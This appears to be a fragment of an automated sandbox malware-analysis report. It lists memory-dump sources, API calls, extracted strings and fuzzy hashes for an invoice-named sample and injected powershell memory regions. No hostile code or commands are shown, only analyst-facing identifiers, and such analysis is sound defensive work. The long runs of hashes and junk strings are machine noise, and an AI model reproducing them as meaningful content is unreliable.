                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                                • API String ID: 2709904686-1246513382
                                                                                                                                                                • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                                                                                                                                • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                                                                                                                                • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4'jq$4'jq$4'jq$4'jq$4:l$4:l$tL/k$tL/k$tL/k$tL/k$tL/k$tL/k$x..k$x..k$x..k$-.k$-.k
                                                                                                                                                                • API String ID: 0-3465172886
                                                                                                                                                                • Opcode ID: 8e476d819dc5aead66d892e4803d680495bdecb36fe36c68ba420dbac51ec929
                                                                                                                                                                • Instruction ID: 2b2dd41462874883b059aec4acc9a5dc7a76192ba8a48bbfd382157d1e2a19f8
                                                                                                                                                                • Opcode Fuzzy Hash: 8e476d819dc5aead66d892e4803d680495bdecb36fe36c68ba420dbac51ec929
                                                                                                                                                                • Instruction Fuzzy Hash: 170362B4A10215CFDB24DB24C991BEEB7B2EF85344F1188A9D90A6B341CB75ED81CF51
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$4'jq$4'jq
                                                                                                                                                                • API String ID: 0-3423955792
                                                                                                                                                                • Opcode ID: 5a594e0aa3c97bf1a149b675f069ff1b2ef5f1759870fe836c4dc7d90b0af8c1
                                                                                                                                                                • Instruction ID: 9e61891f61a309fefdfc25731a79e6db90eb17c647ee87fc293b9e029a778081
                                                                                                                                                                • Opcode Fuzzy Hash: 5a594e0aa3c97bf1a149b675f069ff1b2ef5f1759870fe836c4dc7d90b0af8c1
                                                                                                                                                                • Instruction Fuzzy Hash: 0B328F74B20205DFD714CB98C981FAABBB2EF84305F158059E906AF395CB76EC46CB91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4'jq$4'jq$tL/k$tL/k$tL/k$tL/k$x..k$x..k$-.k$-.k
                                                                                                                                                                • API String ID: 0-1257073014
                                                                                                                                                                • Opcode ID: 5a4d395f9f49c801fb96b6e5d8ebf724b4664409f5bc4acf1d55a037f4769adb
                                                                                                                                                                • Instruction ID: c276abc974cb0cc63988672461f3d7cde9c4f6b1b01e209ac63352a894686f67
                                                                                                                                                                • Opcode Fuzzy Hash: 5a4d395f9f49c801fb96b6e5d8ebf724b4664409f5bc4acf1d55a037f4769adb
                                                                                                                                                                • Instruction Fuzzy Hash: D1C285B4A102158FD764DB24CD91BEEB7B2EF85304F1189A9D90A6B381CB35ED81CF51
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$tL/k$x..k$-.k
                                                                                                                                                                • API String ID: 0-3210324593
                                                                                                                                                                • Opcode ID: fa41e227d316d6ea1c9d40208136fd96d196535097f8f121427c9339455297e2
                                                                                                                                                                • Instruction ID: 81050bd3386cd0a7ccf6d7e20d1a27dfadb1b2764a8f33cdfe69ee38be6df0a5
                                                                                                                                                                • Opcode Fuzzy Hash: fa41e227d316d6ea1c9d40208136fd96d196535097f8f121427c9339455297e2
                                                                                                                                                                • Instruction Fuzzy Hash: 12A2B4B4A10215CFD720DB64C991BAABBB6EF84304F10C999D91A6B341CB75FD81CF91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4'jq$tL/k$x..k$-.k
                                                                                                                                                                • API String ID: 0-589518937
                                                                                                                                                                • Opcode ID: 5316b4ba9325c089120ff4c2a8593c6f9fcfef3d43a44a06e0e15c5c986ca0be
                                                                                                                                                                • Instruction ID: d7bd3d3ed6e434bf60c278a12f05077c60965c4840c10645fdf7a512eb0b6551
                                                                                                                                                                • Opcode Fuzzy Hash: 5316b4ba9325c089120ff4c2a8593c6f9fcfef3d43a44a06e0e15c5c986ca0be
                                                                                                                                                                • Instruction Fuzzy Hash: 66A2C5B4A10205CFDB24DB58C991BAEBBB6EF84300F10C9A9D91A6B355CB35ED41CF91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$x..k$-.k
                                                                                                                                                                • API String ID: 0-1339570531
                                                                                                                                                                • Opcode ID: 723f4f4be1f70bad07595feb4c49e64a5f3959e18a6ec77fbe702d6e1abc2ad9
                                                                                                                                                                • Instruction ID: e00b8fbd48970938467d61e5ed99bd490baa1d2eff96929e6c20d47a00463213
                                                                                                                                                                • Opcode Fuzzy Hash: 723f4f4be1f70bad07595feb4c49e64a5f3959e18a6ec77fbe702d6e1abc2ad9
                                                                                                                                                                • Instruction Fuzzy Hash: CF7293B4A10215CFD720DB54C991BAABBB2EF84304F10C99AD91A6B351CB75FD81CFA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$x..k$-.k
                                                                                                                                                                • API String ID: 0-1339570531
                                                                                                                                                                • Opcode ID: 86137f761fbfcaabae4b81b0a192fb589cdbe78305d8ce01406df33ff9f431e9
                                                                                                                                                                • Instruction ID: a68780d72d689d733b57eef7a9bc1b8eceab8b4b1cc150304f6bd70f92177596
                                                                                                                                                                • Opcode Fuzzy Hash: 86137f761fbfcaabae4b81b0a192fb589cdbe78305d8ce01406df33ff9f431e9
                                                                                                                                                                • Instruction Fuzzy Hash: B97292B4A10215CFDB20DB54C991BAAF7B2EF84304F10C99AD91A6B351CB75BD81CFA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                                                                                                • API String ID: 0-2361207814
                                                                                                                                                                • Opcode ID: 143485d1df2d3b8da2acca9aa84400f4622843de7a9753a638267897d00d7fcd
                                                                                                                                                                • Instruction ID: a5fec21e50b2797fcff6401801b9bb6e64de93b59dba415dacfd467fcd329022
                                                                                                                                                                • Opcode Fuzzy Hash: 143485d1df2d3b8da2acca9aa84400f4622843de7a9753a638267897d00d7fcd
                                                                                                                                                                • Instruction Fuzzy Hash: 8732D535B08224DFCB94CF68C451AAEBBF6EF85310F1488AAE9059B351CB35DD45CBA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$x..k$-.k
                                                                                                                                                                • API String ID: 0-4069803157
                                                                                                                                                                • Opcode ID: 17a2ce1695edcda939e58808f436af7cb3d4bce78e938de4652a3086a7a95d4e
                                                                                                                                                                • Instruction ID: 18292b87d1c6e5ab792e903f0e85d76603cb72ab3c052a871d100ace27c99ba8
                                                                                                                                                                • Opcode Fuzzy Hash: 17a2ce1695edcda939e58808f436af7cb3d4bce78e938de4652a3086a7a95d4e
                                                                                                                                                                • Instruction Fuzzy Hash: 125292B4A10215CFD720DB64C991BAEBBB2EF84304F10C999D91A6B351CB75BD81CFA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$x..k$-.k
                                                                                                                                                                • API String ID: 0-4069803157
                                                                                                                                                                • Opcode ID: 7c9941236273eec7d85b59d5bf0798beed3a7c58bedd8dd6e08a16ef12ec960c
                                                                                                                                                                • Instruction ID: e6cd47a6bd3ed9e0ce36bc33865acdd51770d08b0b8c2017ce2d818d748054d6
                                                                                                                                                                • Opcode Fuzzy Hash: 7c9941236273eec7d85b59d5bf0798beed3a7c58bedd8dd6e08a16ef12ec960c
                                                                                                                                                                • Instruction Fuzzy Hash: 7442A574A102158FD764DB68CD91BEEB7B2AF89304F1188A8D91A6B341CB35FD82CF51
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x..k$-.k
                                                                                                                                                                • API String ID: 0-1696082827
                                                                                                                                                                • Opcode ID: 7289c45714a3cdaab31db0455b266b29f05af666a4c2afbe9cdfb2f025b5a2a3
                                                                                                                                                                • Instruction ID: 2925601ae4776933d21d949f826e4dc64a8be08f59b171fb19562016471c0380
                                                                                                                                                                • Opcode Fuzzy Hash: 7289c45714a3cdaab31db0455b266b29f05af666a4c2afbe9cdfb2f025b5a2a3
                                                                                                                                                                • Instruction Fuzzy Hash: 4132F9B1B202069FCB249F68C951BAEBBB2EF84340F14C469D9059F396CB75DC45CBA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4:l$tL/k$x..k
                                                                                                                                                                • API String ID: 0-2015015718
                                                                                                                                                                • Opcode ID: 2f44e48e28c547f980aa6b4135e446f9a4ad5816fafa581ce2c02f2d533c4ddb
                                                                                                                                                                • Instruction ID: 345b0d1a351b23c82fa7c02484d215d1a67f312a5d7c3217ca77e9a846a09d79
                                                                                                                                                                • Opcode Fuzzy Hash: 2f44e48e28c547f980aa6b4135e446f9a4ad5816fafa581ce2c02f2d533c4ddb
                                                                                                                                                                • Instruction Fuzzy Hash: 13122BB4A20216CFDB34CB24C991BE9B7B2EB45340F1188E9D50AAB391DB75ED81CF51
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4:l$tL/k$x..k
                                                                                                                                                                • API String ID: 0-2015015718
                                                                                                                                                                • Opcode ID: c7dbf36047e24942c654020a63e8b3824404fc35f5f066ddd4e3862dc879eac7
                                                                                                                                                                • Instruction ID: 55c6171d1231f7dba4974d72a0d1eb97b533eb5b0ed68e37cea86265322d0d8b
                                                                                                                                                                • Opcode Fuzzy Hash: c7dbf36047e24942c654020a63e8b3824404fc35f5f066ddd4e3862dc879eac7
                                                                                                                                                                • Instruction Fuzzy Hash: 71124DB4A20216CFDB34CB24C991BE9B7B2EB45340F1188E9D50AAB381DB75ED81CF51
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 84;l$84;l$tPjq$tPjq
                                                                                                                                                                • API String ID: 0-3144484473
                                                                                                                                                                • Opcode ID: d66ef877bed69763db5d65d48e046da40c21678902b6133b9b674d011ed2c340
                                                                                                                                                                • Instruction ID: 8cba686d14b6308d98819c653efb98a31d247905d33d2ba5803de056e3794c27
                                                                                                                                                                • Opcode Fuzzy Hash: d66ef877bed69763db5d65d48e046da40c21678902b6133b9b674d011ed2c340
                                                                                                                                                                • Instruction Fuzzy Hash: A271E635608224DFCB908F68C8506AEBBE6FF84354F64886AEC169F391DB31DD45CB91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq$4'jq$$jq$$jq
                                                                                                                                                                • API String ID: 0-1496060811
                                                                                                                                                                • Opcode ID: 711b5f21f135dde4f77ce08f5d8ed0cfec8d9abb26c0be8e4f4b02a42006dd46
                                                                                                                                                                • Instruction ID: 047004f0a82c38631bded02ca055c70dfa330b18c0137c9038a5b738c62c2b1c
                                                                                                                                                                • Opcode Fuzzy Hash: 711b5f21f135dde4f77ce08f5d8ed0cfec8d9abb26c0be8e4f4b02a42006dd46
                                                                                                                                                                • Instruction Fuzzy Hash: 17218B32B443298FCF149A69A8111FAF7E5FF86650F10887FD886C7586DA39C80AC752
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: $jq$$jq$$jq
                                                                                                                                                                • API String ID: 0-3696375380
                                                                                                                                                                • Opcode ID: 64d42331b68b7bc45bb1ae91435a5db99f991d8d32f54a967be4b4a478766323
                                                                                                                                                                • Instruction ID: 340b2d2f530719661f48f7d4401f5016c9462b57bfb99b5e8d71c446920ebcda
                                                                                                                                                                • Opcode Fuzzy Hash: 64d42331b68b7bc45bb1ae91435a5db99f991d8d32f54a967be4b4a478766323
                                                                                                                                                                • Instruction Fuzzy Hash: 2D4118B2B202569BCB34DAA9C8402EFF7A5EF84750B14852BD905E7246DB32ED05C7E1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq$4'jq
                                                                                                                                                                • API String ID: 0-1204115232
                                                                                                                                                                • Opcode ID: 5f23673d6749d78bff906db534f532c7ffab56a3226727504a2ab9aac9cb6558
                                                                                                                                                                • Instruction ID: b7df74c8514021583e44a663aadef25027f83c8211fa6710fa580ae92b204548
                                                                                                                                                                • Opcode Fuzzy Hash: 5f23673d6749d78bff906db534f532c7ffab56a3226727504a2ab9aac9cb6558
                                                                                                                                                                • Instruction Fuzzy Hash: CC02BF74B112468FDB54DB58C591EAABBF2EF88704F14C069E9059F392CB72EC42CB91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq$4'jq
                                                                                                                                                                • API String ID: 0-1204115232
                                                                                                                                                                • Opcode ID: b77d29d4e631a1ba8d2d71409062e664e5df257c81d0636a01e2a80b53e913dc
                                                                                                                                                                • Instruction ID: 7d724603d0cf2f73a38747803ee9ac213d235a2927e355fbe791e8509acf79d2
                                                                                                                                                                • Opcode Fuzzy Hash: b77d29d4e631a1ba8d2d71409062e664e5df257c81d0636a01e2a80b53e913dc
                                                                                                                                                                • Instruction Fuzzy Hash: F2414AB57242079FCB24DB6C84112EABBA6EFC2350F1584AEC506CB252DB31D945CBA2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: $jq$$jq
                                                                                                                                                                • API String ID: 0-3720491408
                                                                                                                                                                • Opcode ID: 3c259baac076fe5a0f57c4b3fb885a5ed077cc0fc0a3adfb9b9d05581d4ca0ac
                                                                                                                                                                • Instruction ID: a13ea113b00b60dbb7f7c9658fa8db48796ade554c7de5d4926dc95e236cfa22
                                                                                                                                                                • Opcode Fuzzy Hash: 3c259baac076fe5a0f57c4b3fb885a5ed077cc0fc0a3adfb9b9d05581d4ca0ac
                                                                                                                                                                • Instruction Fuzzy Hash: 0F21D8F6D202569BCF30DE99C9801EAB7B5EF49390B198167DC09E7246E730AD40CBE1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq
                                                                                                                                                                • API String ID: 0-3676250632
                                                                                                                                                                • Opcode ID: 3d9ef6b4fe5a8bc2d40e6f97d717d3d7c69ecf8db7fb88966bbf3086d3d089f8
                                                                                                                                                                • Instruction ID: 48f4a986617180570f2d43a22757569cf5d980e6cb597fb36281512b21a842e2
                                                                                                                                                                • Opcode Fuzzy Hash: 3d9ef6b4fe5a8bc2d40e6f97d717d3d7c69ecf8db7fb88966bbf3086d3d089f8
                                                                                                                                                                • Instruction Fuzzy Hash: 82028E74B11205EFDB14CF98C981EA9BBB2EF84304F158059E906AF396C776EC46CB91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: W
                                                                                                                                                                • API String ID: 0-655174618
                                                                                                                                                                • Opcode ID: a6147cd5f2c0b0b35973d6ba70fa0b606d122b2dce9df54a05a985f3dadce265
                                                                                                                                                                • Instruction ID: 2fdadd3821edbb108bbed7bb3ea30b87383759ecce392a7372cffd9aef3aa6ce
                                                                                                                                                                • Opcode Fuzzy Hash: a6147cd5f2c0b0b35973d6ba70fa0b606d122b2dce9df54a05a985f3dadce265
                                                                                                                                                                • Instruction Fuzzy Hash: D1023B74A05209DFCB49CF98D584A9EBBF2FF88310F248559E915AB365C735EC81CB90
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq
                                                                                                                                                                • API String ID: 0-3676250632
                                                                                                                                                                • Opcode ID: f0280aa0438d6af69b455a741823a417b1ec75fc709f77ff6571468e29183096
                                                                                                                                                                • Instruction ID: d0a29fa39f2d8454238c2f9437cbdf56333522346700fcc2dd8dafa7f3c1cdc0
                                                                                                                                                                • Opcode Fuzzy Hash: f0280aa0438d6af69b455a741823a417b1ec75fc709f77ff6571468e29183096
                                                                                                                                                                • Instruction Fuzzy Hash: 94F19BB4B11246DFDB64DF58C581EAABBB2EF88704F15C059E9059B392C772EC42CB90
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l
                                                                                                                                                                • API String ID: 0-645171858
                                                                                                                                                                • Opcode ID: 7ff2e4ccca3e6cc4a47a7e4bcf44d80c132ba85070f04dd25ca07579d149306e
                                                                                                                                                                • Instruction ID: 024a7391628c91822140e947c9c2e1c34951ef928c411e34e1a7e2c6e15f6dc2
                                                                                                                                                                • Opcode Fuzzy Hash: 7ff2e4ccca3e6cc4a47a7e4bcf44d80c132ba85070f04dd25ca07579d149306e
                                                                                                                                                                • Instruction Fuzzy Hash: 99816A35A04214DFCB94CF54C585AAEBBF2EF88314F1985A9E805AB355C736EC82CF60
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
